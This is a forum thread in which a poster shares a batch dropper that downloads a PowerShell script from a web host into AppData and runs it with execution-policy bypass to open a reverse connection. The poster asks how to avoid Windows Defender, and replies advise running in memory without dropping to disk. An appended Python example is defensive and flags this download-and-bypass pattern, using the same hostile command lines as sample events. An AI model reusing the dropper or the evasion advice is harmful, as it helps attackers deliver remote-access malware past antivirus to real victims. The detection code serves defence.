Evading antivirus – Digitalmunition


This topic contains 1 reply, has 2 voices, and was last updated by ShiroiOk 1 month, 1 week ago.

  • #336901


    Hey guys!!

    I have a .ps1 script which, when executed on the target computer, gives me a reverse connection. The problem is that you can’t run a ps1 file by directly clicking on it. So I made a batch script which will execute the ps1 file; the code is pretty simple, you can look at it.

    There is an @ in front of echo, but I am not able to put it there (Reddit’s problem).

    echo off

    cd ..

    curl [http://www.xx.com/file.ps1](http://www.xx.com/file.ps1) -o %cd%\Appdata\local\file.ps1

    powershell -ep bypass %cd%\Appdata\local\hehe.ps1


    So, when I run this batch script it gives me a reverse connection without any problem, but when I convert this bat file to an exe it gets detected by Windows Defender.

    So, can you guys give me any tips on how to fix this? How can I get a reverse connection without getting detected?

  • #336902


    Run in memory, nothing dropped to disk

  • #336903


    Don’t drop to disk
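
From the defender's side, the batch file in the first post leaves a recognizable process trail: curl writing a .ps1 under AppData, then powershell started with an execution-policy bypass from the same parent. The following is an added example, not part of the thread; the event records, hosts, PIDs and rule names are constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation events (command-line auditing style);
# hosts, PIDs, users and timestamps are made up for this example.
EVENTS = [
    {"time": "2024-01-01T10:00:00", "host": "WS1", "ppid": 4120, "image": "curl.exe",
     "cmd": r"curl http://www.xx.com/file.ps1 -o C:\Users\bob\Appdata\local\file.ps1"},
    {"time": "2024-01-01T10:00:02", "host": "WS1", "ppid": 4120, "image": "powershell.exe",
     "cmd": r"powershell -ep bypass C:\Users\bob\Appdata\local\hehe.ps1"},
    {"time": "2024-01-01T11:30:00", "host": "WS2", "ppid": 900, "image": "curl.exe",
     "cmd": r"curl https://example.test/setup.msi -o C:\Temp\setup.msi"},
    {"time": "2024-01-01T12:00:00", "host": "WS3", "ppid": 77, "image": "powershell.exe",
     "cmd": r"powershell -ExecutionPolicy Bypass -File C:\Users\amy\AppData\Local\x.ps1"},
]

# curl saving a PowerShell script into a user-writable AppData path
DOWNLOAD_PS1 = re.compile(r"\s(?:-o|--output)\s+\S*\\appdata\\\S*\.ps1\b", re.I)
# -ep alias and -ex... prefixes of -ExecutionPolicy, set to Bypass
POLICY_BYPASS = re.compile(r"\s-(?:ep|ex\w*)\s+bypass\b", re.I)
PS1_IN_APPDATA = re.compile(r"\\appdata\\\S*\.ps1\b", re.I)

def classify(event):
    """Return the set of rule names a single event matches."""
    hits = set()
    cmd, image = event["cmd"], event["image"].lower()
    if image == "curl.exe" and DOWNLOAD_PS1.search(cmd):
        hits.add("script_download_to_appdata")
    if image == "powershell.exe" and POLICY_BYPASS.search(cmd) and PS1_IN_APPDATA.search(cmd):
        hits.add("policy_bypass_appdata_script")
    return hits

def detect(events, window=timedelta(seconds=60)):
    """Alert per event; escalate when one parent downloads, then bypass-runs."""
    alerts, downloads = [], {}
    for ev in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(ev["time"])
        key = (ev["host"], ev["ppid"])
        for rule in sorted(classify(ev)):
            severity = "medium"
            if rule == "script_download_to_appdata":
                downloads[key] = when
            elif key in downloads and when - downloads[key] <= window:
                severity = "high"  # same parent did the download just before
            alerts.append((ev["host"], rule, severity))
    return alerts

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

The correlation keys on host and parent process rather than on the script's file name, so it still fires when the downloaded and executed names differ, as they do in the posted batch file.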
